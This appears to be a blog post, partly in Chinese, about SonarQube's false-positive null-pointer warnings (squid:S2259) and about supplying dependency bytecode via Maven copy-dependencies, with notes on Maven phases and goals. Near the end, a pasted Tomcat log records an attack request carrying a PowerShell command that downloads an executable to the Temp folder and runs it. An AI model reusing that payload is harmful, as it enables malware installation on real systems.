Commons-lang StringUtils isNotBlank method still raise NPE


public class DetectorImport {
    public String check1(Nonentity nonentity) {
        String s;
        if(nonentity == null) {
            s = null;
        }else {
            s = nonentity.getName();
        if(s !=null) {
            s = s.replaceAll("(", "(");
        return s;


Sonarqube is raising false-positive NPE


I expect that nonNull implementation is in the another file than the main code. Unfortunately that’s the current limitation we have for this rule. If you move nonNull in the file, FP should disappear. This problem can’t be fixed easily, so for now I suggest you to mark issue as FP in SonarQube UI. Anyway thanks for reporting it.

squid:S2259 : A “NullPointerException” could be thrown; “dc” is nullable here. While “dc” is checked as not null

[JAVA] squid:S2259 False Positive with Utility methods 这里提到是支持apache commen的StringUtils包的。

 We currently support methods from commons-lang StringUtils (v2, and v3), guava preconditions, and java 8 methods from java.util.Objects (nonNull, isNull, requireNonNull). As we know how these methods behave, we are able to correctly handle such call and discard similar FPs. Of course, I don’t want to force you using such libraries to make the analyzer happy. :)

report this on Sonar Community: Commons-lang StringUtils isNotBlank method still raise NPE



Bytecode of dependencies was not provided for analysis of source files, you might end up with less precise results. Bytecode can be provided using property.



added the target “dependency:copy-dependencies” as part of the maven execution. This copied all the dependencies to the right location, then I set the property “” in our case.





added the target “dependency:copy-dependencies” as part of the maven execution. This copied all the dependencies to the right location, then I set the property “” in our case.


这个插件的官方maven-dependency-plugin 使用文档,根据样例如下——



  • 在多模块下自定义的这个outputDirectory目录是相对目录,会将依赖的jar包复制到子模块对应的目录下;
  • 根据这里的解决方案使用变量${session.executionRootDirectory}/target/,可以强制将依赖包都复制到固定目录,但只能在执行 mvn package阶段才生效


这里涉及到phasegoal的概念区别:What are Maven goals and phases and what is their difference?

Life cycle is a sequence of named phases.
Phases executes sequentially. Executing a phase means executes all previous phases.

Plugin is a collection of goals also called MOJO (Maven Old Java Object).
Analogy : Plugin is a class and goals are methods within the class.

default Maven lifecycle bindings这里定义了在各个“阶段”(phase)都会执行哪些“目标动作”(goals)

mvn [plugin-name]:[goal-name] ,例如mvn dependency:copy-dependencies就是执行了插件maven-dependency-plugin定义的copy-dependencies动作。进一步,对应的configuration可以通过变量进行传参。



  1. 直接执行goal,mvn dependency:copy-dependencies -DoutputDirectory=absolute/path/to/lib/dir将所有的依赖复制到指定目录,
  2. 将上面的目录传递给sonar的变量,例如*.jar


2020-03-09 13:48:49.794  INFO 2173 --- [p-nio-80-exec-3] org.apache.tomcat.util.http.Parameters   : Character decoding failed. Parameter [mail[#markup]] with value [ powershell (new-object System.Net.WebClient).DownloadFile('','%SystemRoot%/Temp/zjajlhxadgirori21058.exe');start %SystemRoot%/Temp/zjajlhxadgirori21058.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.
2020-03-10 03:44:19.910  INFO 2173 --- [p-nio-80-exec-7] o.apache.coyote.http11.Http11Processor   : Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

java.lang.IllegalArgumentException: Invalid character found in the HTTP protocol
	at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine( ~[tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at org.apache.coyote.http11.Http11Processor.service( ~[tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at org.apache.coyote.AbstractProcessorLight.process( [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process( [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at$SocketProcessor.doRun( [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at java.util.concurrent.ThreadPoolExecutor.runWorker( [na:1.8.0_232]
	at java.util.concurrent.ThreadPoolExecutor$ [na:1.8.0_232]
	at org.apache.tomcat.util.threads.TaskThread$ [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at [na:1.8.0_232]

comments powered by Disqus